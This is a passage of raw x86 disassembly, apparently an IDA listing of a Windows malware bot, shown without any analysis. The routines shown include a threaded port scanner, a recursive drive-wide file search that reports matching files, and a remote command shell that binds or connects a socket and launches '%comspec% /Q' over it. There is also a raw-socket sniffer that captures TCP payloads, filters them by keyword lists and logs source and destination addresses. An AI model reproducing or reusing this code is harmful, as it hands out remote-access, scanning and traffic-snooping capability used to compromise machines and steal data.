mov ecx, [ebp+var_4]
mov eax, [ebp+eax*4+var_29C]
cmp eax, [ebp+ecx*4+var_88]
jnz short loc_603D06
jmp short loc_603D08
; ---------------------------------------------------------------------------
loc_603D06: ; CODE XREF: sub_603C3B+C7�j
jmp short loc_603CD0
; ---------------------------------------------------------------------------
loc_603D08: ; CODE XREF: sub_603C3B+AE�j
; sub_603C3B+C9�j
mov eax, [ebp+var_2C0]
cmp eax, [ebp+var_2A0]
jnz short loc_603D43
cmp [ebp+var_2A0], 40h
jnb short loc_603D43
mov eax, [ebp+var_2C0]
mov ecx, [ebp+var_4]
mov ecx, [ebp+ecx*4+var_88]
mov [ebp+eax*4+var_29C], ecx
mov eax, [ebp+var_2A0]
inc eax
mov [ebp+var_2A0], eax
loc_603D43: ; CODE XREF: sub_603C3B+D9�j
; sub_603C3B+E2�j
xor eax, eax
jnz short loc_603CC7
loc_603D47: ; CODE XREF: sub_603C3B+18A�j
and [ebp+var_2C4], 0
jmp short loc_603D5D
; ---------------------------------------------------------------------------
loc_603D50: ; CODE XREF: sub_603C3B:loc_603D86�j
mov eax, [ebp+var_2C4]
inc eax
mov [ebp+var_2C4], eax
loc_603D5D: ; CODE XREF: sub_603C3B+113�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_190]
jnb short loc_603D88
mov eax, [ebp+var_2C4]
mov ecx, [ebp+var_4]
mov eax, [ebp+eax*4+var_18C]
cmp eax, [ebp+ecx*4+var_88]
jnz short loc_603D86
jmp short loc_603D88
; ---------------------------------------------------------------------------
loc_603D86: ; CODE XREF: sub_603C3B+147�j
jmp short loc_603D50
; ---------------------------------------------------------------------------
loc_603D88: ; CODE XREF: sub_603C3B+12E�j
; sub_603C3B+149�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_190]
jnz short loc_603DC3
cmp [ebp+var_190], 40h
jnb short loc_603DC3
mov eax, [ebp+var_2C4]
mov ecx, [ebp+var_4]
mov ecx, [ebp+ecx*4+var_88]
mov [ebp+eax*4+var_18C], ecx
mov eax, [ebp+var_190]
inc eax
mov [ebp+var_190], eax
loc_603DC3: ; CODE XREF: sub_603C3B+159�j
; sub_603C3B+162�j
xor eax, eax
jnz short loc_603D47
push 10h
call dword_6010E0 ; Sleep
jmp loc_603C84
; ---------------------------------------------------------------------------
loc_603DD4: ; CODE XREF: sub_603C3B+54�j
and [ebp+var_4], 0
jmp short loc_603DE1
; ---------------------------------------------------------------------------
loc_603DDA: ; CODE XREF: sub_603C3B+1D8�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_603DE1: ; CODE XREF: sub_603C3B+19D�j
cmp [ebp+var_4], 20h
jge short loc_603E15
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call dword_601110 ; ntohl
mov [ebp+var_2B4], eax
push 10h
lea eax, [ebp+var_2B8]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call dword_60112C ; connect
jmp short loc_603DDA
; ---------------------------------------------------------------------------
loc_603E15: ; CODE XREF: sub_603C3B+1AA�j
push 1400h
call dword_6010E0 ; Sleep
lea eax, [ebp+var_2A8]
push eax
push 0
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_2A0]
push eax
push 0
call dword_601138 ; select
mov [ebp+var_194], eax
and [ebp+var_4], 0
jmp short loc_603E52
; ---------------------------------------------------------------------------
loc_603E4B: ; CODE XREF: sub_603C3B:loc_603EB0�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_603E52: ; CODE XREF: sub_603C3B+20E�j
cmp [ebp+var_4], 20h
jge short loc_603EB2
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call dword_601140 ; closesocket
cmp [ebp+var_194], 0FFFFFFFFh
jz short loc_603EA5
lea eax, [ebp+var_2A0]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call sub_604F04 ; __WSAFDIsSet
test eax, eax
jnz short loc_603EB0
lea eax, [ebp+var_190]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call sub_604F04 ; __WSAFDIsSet
test eax, eax
jnz short loc_603EB0
loc_603EA5: ; CODE XREF: sub_603C3B+234�j
mov eax, [ebp+var_4]
or [ebp+eax*4+var_88], 0FFFFFFFFh
loc_603EB0: ; CODE XREF: sub_603C3B+24E�j
; sub_603C3B+268�j
jmp short loc_603E4B
; ---------------------------------------------------------------------------
loc_603EB2: ; CODE XREF: sub_603C3B+21B�j
and [ebp+var_4], 0
jmp short loc_603EBF
; ---------------------------------------------------------------------------
loc_603EB8: ; CODE XREF: sub_603C3B:loc_603EFB�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_603EBF: ; CODE XREF: sub_603C3B+27B�j
cmp [ebp+var_4], 20h
jge short locret_603EFD
mov eax, [ebp+var_4]
cmp [ebp+eax*4+var_88], 0FFFFFFFFh
jz short loc_603EFB
push 0
push 0
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call dword_601110 ; ntohl
push eax
push offset sub_604AC1
push 0
push 0
call dword_6010C4 ; CreateThread
push 8
call dword_6010E0 ; Sleep
loc_603EFB: ; CODE XREF: sub_603C3B+295�j
jmp short loc_603EB8
; ---------------------------------------------------------------------------
locret_603EFD: ; CODE XREF: sub_603C3B+288�j
leave
retn 8
sub_603C3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_603F01 proc near ; CODE XREF: sub_602D3E+E3�p
; sub_603F01+39�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov eax, [ebp+arg_0]
mov al, [eax]
mov [ebp+var_4], al
cmp [ebp+var_4], 0
jz short loc_603F22
cmp [ebp+var_4], 2Ah
jz short loc_603F32
cmp [ebp+var_4], 3Fh
jz short loc_603F6A
jmp short loc_603F8B
; ---------------------------------------------------------------------------
loc_603F22: ; CODE XREF: sub_603F01+11�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
neg eax
sbb eax, eax
inc eax
jmp loc_603FC0
; ---------------------------------------------------------------------------
loc_603F32: ; CODE XREF: sub_603F01+17�j
push [ebp+arg_4]
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_603F01
cmp eax, 1
jnz short loc_603F4B
xor eax, eax
inc eax
jmp short loc_603FC0
; ---------------------------------------------------------------------------
jmp short loc_603F6A
; ---------------------------------------------------------------------------
loc_603F4B: ; CODE XREF: sub_603F01+41�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_603F66
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_603F01
jmp short loc_603FC0
; ---------------------------------------------------------------------------
jmp short loc_603F6A
; ---------------------------------------------------------------------------
loc_603F66: ; CODE XREF: sub_603F01+52�j
xor eax, eax
jmp short loc_603FC0
; ---------------------------------------------------------------------------
loc_603F6A: ; CODE XREF: sub_603F01+1D�j
; sub_603F01+48�j ...
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_603F7A
xor eax, eax
jmp short loc_603FC0
; ---------------------------------------------------------------------------
jmp short loc_603F8B
; ---------------------------------------------------------------------------
loc_603F7A: ; CODE XREF: sub_603F01+71�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_603F01
jmp short loc_603FC0
; ---------------------------------------------------------------------------
loc_603F8B: ; CODE XREF: sub_603F01+1F�j
; sub_603F01+77�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
push eax
call dword_6010F0 ; CharUpperA
mov esi, eax
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call dword_6010F0 ; CharUpperA
cmp esi, eax
jnz short loc_603FBE
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_603F01
jmp short loc_603FC0
; ---------------------------------------------------------------------------
jmp short loc_603FC0
; ---------------------------------------------------------------------------
loc_603FBE: ; CODE XREF: sub_603F01+A8�j
xor eax, eax
loc_603FC0: ; CODE XREF: sub_603F01+2C�j
; sub_603F01+46�j ...
pop esi
leave
retn 8
sub_603F01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_603FC5 proc near ; CODE XREF: sub_6030CA+364�p
var_108 = dword ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
and [ebp+var_108], 0
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call dword_6010CC ; lstrcpynA
push 0
push 0
lea eax, [ebp+var_108]
push eax
push offset sub_60401F
push 0
push 0
call dword_6010C4 ; CreateThread
test eax, eax
jz short locret_60401B
loc_604008: ; CODE XREF: sub_603FC5+54�j
cmp [ebp+var_108], 0
jnz short locret_60401B
push 8
call dword_6010E0 ; Sleep
jmp short loc_604008
; ---------------------------------------------------------------------------
locret_60401B: ; CODE XREF: sub_603FC5+41�j
; sub_603FC5+4A�j
leave
retn 4
sub_603FC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60401F proc near ; DATA XREF: sub_603FC5+30�o
var_318 = byte ptr -318h
var_314 = byte ptr -314h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 318h
push 108h
push [ebp+arg_0]
lea eax, [ebp+var_318]
push eax
call sub_6039D1
mov eax, [ebp+arg_0]
mov dword ptr [eax], 1
lea eax, [ebp+var_208]
push eax
push 200h
call dword_60107C ; GetLogicalDriveStringsA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_604069
cmp [ebp+var_4], 200h
jbe short loc_60406D
loc_604069: ; CODE XREF: sub_60401F+3F�j
xor eax, eax
jmp short locret_6040D5
; ---------------------------------------------------------------------------
loc_60406D: ; CODE XREF: sub_60401F+48�j
lea eax, [ebp+var_208]
mov [ebp+var_20C], eax
jmp short loc_604097
; ---------------------------------------------------------------------------
loc_60407B: ; CODE XREF: sub_60401F:loc_6040D1�j
push [ebp+var_20C]
call dword_601078 ; lstrlenA
mov ecx, [ebp+var_20C]
lea eax, [ecx+eax+1]
mov [ebp+var_20C], eax
loc_604097: ; CODE XREF: sub_60401F+5A�j
mov eax, [ebp+var_20C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_6040D3
push [ebp+var_20C]
call dword_601074 ; GetDriveTypeA
mov [ebp+var_210], eax
cmp [ebp+var_210], 3
jnz short loc_6040D1
lea eax, [ebp+var_314]
push eax
push [ebp+var_20C]
call sub_6040D9
loc_6040D1: ; CODE XREF: sub_60401F+9E�j
jmp short loc_60407B
; ---------------------------------------------------------------------------
loc_6040D3: ; CODE XREF: sub_60401F+83�j
xor eax, eax
locret_6040D5: ; CODE XREF: sub_60401F+4C�j
leave
retn 4
sub_60401F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6040D9 proc near ; CODE XREF: sub_60401F+AD�p
; sub_6040D9+AB�p
var_544 = dword ptr -544h
var_540 = dword ptr -540h
var_514 = byte ptr -514h
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 544h
push [ebp+arg_0]
push offset a_256s ; "%.256s*"
lea eax, [ebp+var_200]
push eax
call dword_6010F4 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_540]
push eax
lea eax, [ebp+var_200]
push eax
call dword_601088 ; FindFirstFileA
mov [ebp+var_544], eax
cmp [ebp+var_544], 0FFFFFFFFh
jnz short loc_604122
jmp locret_6041F1
; ---------------------------------------------------------------------------
loc_604122: ; CODE XREF: sub_6040D9+42�j
; sub_6040D9+106�j
mov eax, [ebp+var_540]
and eax, 10h
jz short loc_60418B
push offset a_ ; "."
lea eax, [ebp+var_514]
push eax
call dword_6010B8 ; lstrcmpA
test eax, eax
jz short loc_604159
push offset a__ ; ".."
lea eax, [ebp+var_514]
push eax
call dword_6010B8 ; lstrcmpA
test eax, eax
jnz short loc_60415B
loc_604159: ; CODE XREF: sub_6040D9+68�j
jmp short loc_6041CA
; ---------------------------------------------------------------------------
loc_60415B: ; CODE XREF: sub_6040D9+7E�j
lea eax, [ebp+var_514]
push eax
push [ebp+arg_0]
push offset a_256s_250s ; "%.256s%.250s\\"
lea eax, [ebp+var_200]
push eax
call dword_6010F4 ; wsprintfA
add esp, 10h
push [ebp+arg_4]
lea eax, [ebp+var_200]
push eax
call sub_6040D9
jmp short loc_6041CA
; ---------------------------------------------------------------------------
loc_60418B: ; CODE XREF: sub_6040D9+52�j
lea eax, [ebp+var_514]
push eax
push [ebp+arg_4]
call sub_603F01
cmp eax, 1
jnz short loc_6041CA
lea eax, [ebp+var_514]
push eax
push [ebp+arg_0]
push offset aFindfile_256s_ ; "[findfile] %.256s%.240s"
lea eax, [ebp+var_400]
push eax
call dword_6010F4 ; wsprintfA
add esp, 10h
lea eax, [ebp+var_400]
push eax
call sub_602CF3
loc_6041CA: ; CODE XREF: sub_6040D9:loc_604159�j
; sub_6040D9+B0�j ...
lea eax, [ebp+var_540]
push eax
push [ebp+var_544]
call dword_601084 ; FindNextFileA
test eax, eax
jnz loc_604122
push [ebp+var_544]
call dword_601080 ; FindClose
locret_6041F1: ; CODE XREF: sub_6040D9+44�j
leave
retn 8
sub_6040D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6041F5 proc near ; CODE XREF: sub_6030CA+34B�p
var_108 = dword ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
and [ebp+var_108], 0
push 100h
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call dword_6010CC ; lstrcpynA
push 0
push 0
lea eax, [ebp+var_108]
push eax
push offset sub_60424F
push 0
push 0
call dword_6010C4 ; CreateThread
test eax, eax
jz short locret_60424B
loc_604238: ; CODE XREF: sub_6041F5+54�j
cmp [ebp+var_108], 0
jnz short locret_60424B
push 8
call dword_6010E0 ; Sleep
jmp short loc_604238
; ---------------------------------------------------------------------------
locret_60424B: ; CODE XREF: sub_6041F5+41�j
; sub_6041F5+4A�j
leave
retn 4
sub_6041F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60424F proc near ; DATA XREF: sub_6041F5+30�o
var_274 = dword ptr -274h
var_270 = word ptr -270h
var_26E = word ptr -26Eh
var_26C = dword ptr -26Ch
var_260 = dword ptr -260h
var_234 = dword ptr -234h
var_230 = word ptr -230h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 274h
push 100h
mov eax, [ebp+arg_0]
add eax, 4
push eax
lea eax, [ebp+var_108]
push eax
call dword_6010CC ; lstrcpynA
mov eax, [ebp+arg_0]
mov dword ptr [eax], 1
push 3Ah
lea eax, [ebp+var_108]
push eax
call sub_603A00
mov [ebp+var_214], eax
cmp [ebp+var_214], 0
jnz short loc_60429E
xor eax, eax
jmp locret_60441E
; ---------------------------------------------------------------------------
loc_60429E: ; CODE XREF: sub_60424F+46�j
mov eax, [ebp+var_214]
mov byte ptr [eax], 0
mov eax, [ebp+var_214]
inc eax
mov [ebp+var_214], eax
push [ebp+var_214]
call sub_60393B
mov word ptr [ebp+var_4], ax
lea eax, [ebp+var_108]
push eax
call dword_60114C ; inet_addr
mov [ebp+var_26C], eax
push [ebp+var_4]
call dword_6010FC ; ntohs
mov [ebp+var_26E], ax
mov [ebp+var_270], 2
cmp [ebp+var_26C], 0
jnz short loc_604357
push 0
push 0
push 0
push 6
push 1
push 2
call dword_60111C ; WSASocketA
mov [ebp+var_274], eax
push 10h
lea eax, [ebp+var_270]
push eax
push [ebp+var_274]
call dword_601148 ; bind
push 0
push [ebp+var_274]
call dword_601150 ; listen
push 0
push 0
push [ebp+var_274]
call dword_601108 ; accept
mov [ebp+var_10C], eax
push [ebp+var_274]
call dword_601140 ; closesocket
jmp short loc_604384
; ---------------------------------------------------------------------------
loc_604357: ; CODE XREF: sub_60424F+A7�j
push 0
push 0
push 0
push 6
push 1
push 2
call dword_60111C ; WSASocketA
mov [ebp+var_10C], eax
push 10h
lea eax, [ebp+var_270]
push eax
push [ebp+var_10C]
call dword_60112C ; connect
loc_604384: ; CODE XREF: sub_60424F+106�j
push 44h
lea eax, [ebp+var_260]
push eax
call sub_60397F
mov [ebp+var_260], 44h
mov [ebp+var_234], 181h
and [ebp+var_230], 0
mov eax, [ebp+var_10C]
mov [ebp+var_224], eax
mov eax, [ebp+var_224]
mov [ebp+var_228], eax
mov eax, [ebp+var_228]
mov [ebp+var_220], eax
push 100h
lea eax, [ebp+var_210]
push eax
push offset aComspecQ ; "\"%comspec%\" /Q"
call dword_60108C ; ExpandEnvironmentStringsA
push offset aD ; "d"
lea eax, [ebp+var_260]
push eax
push 0
push 0
push 10h
push 1
push 0
push 0
lea eax, [ebp+var_210]
push eax
push 0
call dword_6010B4 ; CreateProcessA
push [ebp+var_10C]
call dword_601140 ; closesocket
xor eax, eax
locret_60441E: ; CODE XREF: sub_60424F+4A�j
leave
retn 4
sub_60424F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_604422 proc near ; CODE XREF: sub_6030CA+281�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov dword_6014B0, 2
mov byte_6014B8, 0
cmp [ebp+arg_0], 0
jz short loc_60449A
push 20h
push [ebp+arg_0]
call sub_603A00
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_604471
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
push 80h
push [ebp+var_8]
push offset byte_6014B8
call dword_6010CC ; lstrcpynA
loc_604471: ; CODE XREF: sub_604422+2D�j
push [ebp+arg_0]
call sub_60393B
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_60448C
cmp [ebp+var_8], 0
jnz short loc_60448C
jmp short locret_6044BF
; ---------------------------------------------------------------------------
jmp short loc_60449A
; ---------------------------------------------------------------------------
loc_60448C: ; CODE XREF: sub_604422+5E�j
; sub_604422+64�j
cmp [ebp+var_4], 4
jnb short loc_60449A
mov eax, [ebp+var_4]
mov dword_6014B0, eax
loc_60449A: ; CODE XREF: sub_604422+1A�j
; sub_604422+68�j ...
cmp dword_601704, 1
jnz short locret_6044BF
and dword_601704, 0
push 0
push 0
push 0
push offset sub_6044D2
push 0
push 0
call dword_6010C4 ; CreateThread
locret_6044BF: ; CODE XREF: sub_604422+66�j
; sub_604422+7F�j
leave
retn 4
sub_604422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6044C3 proc near ; CODE XREF: sub_6030CA:loc_603355�p
push ebp
mov ebp, esp
mov dword_601704, 1
pop ebp
retn
sub_6044C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6044D2 proc near ; DATA XREF: sub_604422+8E�o
var_1F8 = byte ptr -1F8h
var_1F6 = word ptr -1F6h
var_1E8 = dword ptr -1E8h
var_1E4 = dword ptr -1E4h
var_1E0 = byte ptr -1E0h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_24 = byte ptr -24h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
push ebp
mov ebp, esp
sub esp, 1F8h
mov [ebp+var_10], 10h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1F8]
push eax
push dword_601540
call dword_601134 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_604505
xor eax, eax
jmp locret_604817
; ---------------------------------------------------------------------------
loc_604505: ; CODE XREF: sub_6044D2+2A�j
and [ebp+var_1F6], 0
push 0
push 3
push 2
call dword_601124 ; socket
mov [ebp+var_38], eax
cmp [ebp+var_38], 0FFFFFFFFh
jnz short loc_604529
xor eax, eax
jmp locret_604817
; ---------------------------------------------------------------------------
loc_604529: ; CODE XREF: sub_6044D2+4E�j
push 10h
lea eax, [ebp+var_1F8]
push eax
push [ebp+var_38]
call dword_601148 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_604550
push [ebp+var_38]
call dword_601140 ; closesocket
xor eax, eax
jmp locret_604817
; ---------------------------------------------------------------------------
loc_604550: ; CODE XREF: sub_6044D2+6C�j
mov [ebp+var_14], 1
push 0
push 0
lea eax, [ebp+var_44]
push eax
push 0
push 0
push 4
lea eax, [ebp+var_14]
push eax
push 98000001h
push [ebp+var_38]
call dword_601104 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_60458C
push [ebp+var_38]
call dword_601140 ; closesocket
xor eax, eax
jmp locret_604817
; ---------------------------------------------------------------------------
loc_60458C: ; CODE XREF: sub_6044D2+A8�j
push 10000h
push 0
call dword_601094 ; GlobalAlloc
mov [ebp+var_48], eax
mov eax, [ebp+var_48]
mov [ebp+var_34], eax
loc_6045A2: ; CODE XREF: sub_6044D2+F5�j
; sub_6044D2+103�j ...
cmp dword_601704, 0
jnz loc_60480C
push 0
push 10000h
push [ebp+var_48]
push [ebp+var_38]
call dword_60113C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_6045C9
jmp short loc_6045A2
; ---------------------------------------------------------------------------
loc_6045C9: ; CODE XREF: sub_6044D2+F3�j
mov eax, [ebp+var_34]
movzx eax, byte ptr [eax+9]
cmp eax, 6
jz short loc_6045D7
jmp short loc_6045A2
; ---------------------------------------------------------------------------
loc_6045D7: ; CODE XREF: sub_6044D2+101�j
mov eax, [ebp+var_34]
movzx eax, byte ptr [eax]
and eax, 0Fh
shl eax, 2
mov [ebp+var_40], eax
cmp [ebp+var_40], 3Ch
jbe short loc_6045EE
jmp short loc_6045A2
; ---------------------------------------------------------------------------
loc_6045EE: ; CODE XREF: sub_6044D2+118�j
mov eax, [ebp+var_34]
mov ax, [eax+2]
push eax
call dword_601100 ; ntohs
movzx eax, ax
mov [ebp+var_4C], eax
mov eax, [ebp+var_48]
add eax, [ebp+var_40]
mov [ebp+var_60], eax
mov eax, [ebp+var_60]
movzx eax, byte ptr [eax+0Ch]
sar eax, 4
shl eax, 2
mov [ebp+var_30], eax
mov eax, [ebp+var_40]
add eax, [ebp+var_30]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_4C]
jb short loc_604631
jmp loc_6045A2
; ---------------------------------------------------------------------------
loc_604631: ; CODE XREF: sub_6044D2+158�j
mov eax, [ebp+var_4C]
sub eax, [ebp+var_8]
mov [ebp+var_3C], eax
mov eax, [ebp+var_60]
mov ax, [eax]
push eax
call dword_601100 ; ntohs
mov [ebp+var_4], ax
mov eax, [ebp+var_60]
mov ax, [eax+2]
push eax
call dword_601100 ; ntohs
mov [ebp+var_28], ax
movzx eax, [ebp+var_4]
cmp eax, 50h
jz short loc_6046A9
movzx eax, [ebp+var_28]
cmp eax, 50h
jz short loc_6046A9
movzx eax, [ebp+var_4]
cmp eax, 19h
jz short loc_6046A9
movzx eax, [ebp+var_28]
cmp eax, 19h
jz short loc_6046A9
movzx eax, [ebp+var_4]
cmp eax, 6Eh
jz short loc_6046A9
movzx eax, [ebp+var_28]
cmp eax, 6Eh
jz short loc_6046A9
movzx eax, [ebp+var_4]
cmp eax, 8Bh
jz short loc_6046A9
movzx eax, [ebp+var_28]
cmp eax, 8Bh
jnz short loc_6046AE
loc_6046A9: ; CODE XREF: sub_6044D2+192�j
; sub_6044D2+19B�j ...
jmp loc_6045A2
; ---------------------------------------------------------------------------
loc_6046AE: ; CODE XREF: sub_6044D2+1D5�j
mov eax, [ebp+var_48]
add eax, [ebp+var_8]
mov [ebp+var_1E8], eax
mov eax, [ebp+var_1E8]
add eax, [ebp+var_3C]
mov byte ptr [eax], 0
and [ebp+var_1E4], 0
and [ebp+var_2C], 0
jmp short loc_6046DA
; ---------------------------------------------------------------------------
loc_6046D3: ; CODE XREF: sub_6044D2:loc_60473F�j
mov eax, [ebp+var_2C]
inc eax
mov [ebp+var_2C], eax
loc_6046DA: ; CODE XREF: sub_6044D2+1FF�j
mov eax, [ebp+var_2C]
cmp eax, [ebp+var_3C]
jnb short loc_604741
mov eax, [ebp+var_1E8]
add eax, [ebp+var_2C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_604703
mov eax, [ebp+var_1E8]
add eax, [ebp+var_2C]
movsx eax, byte ptr [eax]
cmp eax, 7Fh
jle short loc_604711
loc_604703: ; CODE XREF: sub_6044D2+21E�j
mov [ebp+var_1E4], 1
jmp short loc_604741
; ---------------------------------------------------------------------------
jmp short loc_60473F
; ---------------------------------------------------------------------------
loc_604711: ; CODE XREF: sub_6044D2+22F�j
mov eax, [ebp+var_1E8]
add eax, [ebp+var_2C]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_604733
mov eax, [ebp+var_1E8]
add eax, [ebp+var_2C]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_60473F
loc_604733: ; CODE XREF: sub_6044D2+24E�j
mov eax, [ebp+var_1E8]
add eax, [ebp+var_2C]
mov byte ptr [eax], 20h
loc_60473F: ; CODE XREF: sub_6044D2+23D�j
; sub_6044D2+25F�j
jmp short loc_6046D3
; ---------------------------------------------------------------------------
loc_604741: ; CODE XREF: sub_6044D2+20E�j
; sub_6044D2+23B�j
cmp [ebp+var_1E4], 1
jnz short loc_60474F
jmp loc_6045A2
; ---------------------------------------------------------------------------
loc_60474F: ; CODE XREF: sub_6044D2+276�j
push offset dword_6017C8
push [ebp+var_1E8]
call sub_603A31
test eax, eax
jz short loc_604768
jmp loc_6045A2
; ---------------------------------------------------------------------------
loc_604768: ; CODE XREF: sub_6044D2+28F�j
push [ebp+var_1E8]
call sub_60481B
cmp eax, 1
jnz loc_604807
mov eax, [ebp+var_34]
push dword ptr [eax+0Ch]
call dword_601118 ; inet_ntoa
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_604796
jmp loc_6045A2
; ---------------------------------------------------------------------------
loc_604796: ; CODE XREF: sub_6044D2+2BD�j
push 10h
push [ebp+var_C]
lea eax, [ebp+var_5C]
push eax
call dword_6010CC ; lstrcpynA
mov eax, [ebp+var_34]
push dword ptr [eax+10h]
call dword_601118 ; inet_ntoa
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_6047BF
jmp loc_6045A2
; ---------------------------------------------------------------------------
loc_6047BF: ; CODE XREF: sub_6044D2+2E6�j
push 10h
push [ebp+var_C]
lea eax, [ebp+var_24]
push eax
call dword_6010CC ; lstrcpynA
push [ebp+var_1E8]
movzx eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
movzx eax, [ebp+var_4]
push eax
lea eax, [ebp+var_5C]
push eax
push offset a_16sHu_16sHu_2 ; "[%.16s:%hu->%.16s:%hu] \"%.256s\""
lea eax, [ebp+var_1E0]
push eax
call dword_6010F4 ; wsprintfA
add esp, 1Ch
lea eax, [ebp+var_1E0]
push eax
call sub_602CF3
loc_604807: ; CODE XREF: sub_6044D2+2A4�j
jmp loc_6045A2
; ---------------------------------------------------------------------------
loc_60480C: ; CODE XREF: sub_6044D2+D7�j
push [ebp+var_48]
call dword_601090 ; GlobalFree
xor eax, eax
locret_604817: ; CODE XREF: sub_6044D2+2E�j
; sub_6044D2+52�j ...
leave
retn 4
sub_6044D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60481B proc near ; CODE XREF: sub_6044D2+29C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
movsx eax, byte_6014B8
test eax, eax
jz short loc_604842
push [ebp+arg_0]
push offset byte_6014B8
call sub_603F01
cmp eax, 1
jnz short loc_604842
xor eax, eax
inc eax
jmp short locret_6048A2
; ---------------------------------------------------------------------------
loc_604842: ; CODE XREF: sub_60481B+E�j
; sub_60481B+20�j
and [ebp+var_8], 0
jmp short loc_60484F
; ---------------------------------------------------------------------------
loc_604848: ; CODE XREF: sub_60481B:loc_60489E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_60484F: ; CODE XREF: sub_60481B+2B�j
mov eax, [ebp+var_8]
cmp eax, dword_6014B0
jnb short loc_6048A0
and [ebp+var_4], 0
jmp short loc_604867
; ---------------------------------------------------------------------------
loc_604860: ; CODE XREF: sub_60481B:loc_60489C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_604867: ; CODE XREF: sub_60481B+43�j
mov eax, [ebp+var_8]
mov eax, off_601740[eax*4]
mov ecx, [ebp+var_4]
cmp dword ptr [eax+ecx*4], 0
jz short loc_60489E
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov eax, off_601740[eax*4]
mov ecx, [ebp+var_4]
push dword ptr [eax+ecx*4]
call sub_603F01
cmp eax, 1
jnz short loc_60489C
xor eax, eax
inc eax
jmp short locret_6048A2
